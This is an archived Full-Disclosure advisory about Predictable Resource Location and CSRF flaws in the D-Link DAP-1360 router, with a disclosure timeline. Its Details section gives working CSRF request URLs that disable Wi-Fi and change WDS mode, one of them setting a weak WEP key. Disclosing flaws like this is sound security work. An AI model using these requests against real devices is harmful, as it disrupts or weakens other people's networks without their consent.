lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <00aa01d2c129$4a0a61e0$0100a8c0@pc> Date: Sat, 29 Apr 2017 23:43:07 +0300 From: "MustLive" <mustlive@...security.com.ua> To: <submissions@...ketstormsecurity.org>, <fulldisclosure@...lists.org> Subject: [FD] PRL and CSRF vulnerabilities in D-Link DAP-1360 Hello list! After previous Cross-Site Request Forgery and Cross-Site Scripting vulnerabilities, here are new ones. There are Predictable Resource Location and Cross-Site Request Forgery vulnerabilities in D-Link DAP-1360 (Wi-Fi Access Point and Router). ------------------------- Affected products: ------------------------- Vulnerable is the next model: D-Link DAP-1360, Firmware 1.0.0. This model with other firmware versions also must be vulnerable. D-Link should fix these CSRF vulnerabilities in the next version of firmware, as they answered me in October 2014. I tested model DAP-1360/B/D1B. There are three models of DAP-1360: DAP-1360/B1A (f/w ver 2.xx) - D-Link will not add fixes, it's EOL device. DAP-1360/B/D1B (f/w ver 1.x.x - 2.x.x) - D-Link should possibly fix the vulnerabilities in new firmware. DAP-1360/A/E1A (f/w ver 2.5.4 or later) - the first public firmware possibly includes fixes for the vulnerabilities. ---------- Details: ---------- Predictable Resource Location (WASC-34): When D-Link DAP-1360 is used as a router, then it's possible to access to admin panel via address http://dlink.ap. This address is used in different D-Link devices with router functionality. It's simplify CSRF and XSS attacks - all vulnerabilities, which I wrote about in previous advisories. Because changing IP will not help and it's possible to remotely conduct CSRF attacks by using domain name. CSRF (WASC-09): This PRL vulnerability can be used as with all previous CSRF vulnerabilities, as with new ones, mentioned bellow. And changing IP from default 192.168.0.50 to another will not help. For example you can turn off Wi-Fi: http://dlink.ap/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=39&res_struct_size=0&res_buf={%22Radio%22:false,%22mbssidNum%22:1,%22mbssidCur%22:1} CSRF (WASC-09): In section Wi-Fi - WDS it's possible to change parameter WDS Mode: Turn off - Disable: http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=109&res_struct_size=0&res_buf={%22wds%22:{%22WdsEnable%22:%220%22}} Turn on - Bridge mode: http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=109&res_struct_size=0&res_buf={%22wds%22:{%22WdsEnable%22:%222%22,%22WdsPhyMode%22:%22CCK%22,%22WdsEncrypType%22:%22WEP%22,%22WdsKey%22:%22wfkey%22,%22Wds1Mac%22:%22%22,%22Wds2Mac%22:%22%22,%22Wds3Mac%22:%22%22,%22Wds4Mac%22:%22%22}} Turn on - Repeater mode: http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=109&res_struct_size=0&res_buf={%22wds%22:{%22WdsEnable%22:%223%22,%22WdsPhyMode%22:%22CCK%22,%22WdsEncrypType%22:%22WEP%22,%22WdsKey%22:%22wfkey%22,%22Wds1Mac%22:%22%22,%22Wds2Mac%22:%22%22,%22Wds3Mac%22:%22%22,%22Wds4Mac%22:%22%22}} ------------ Timeline: ------------ 2014.05.22 - informed developers about vulnerabilities in D-Link DAP-1360. 2014-2017 - informed developers about multiple vulnerabilities in this and other D-Link devices. 2017.03.03 - disclosed at my site (http://websecurity.com.ua/8525/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists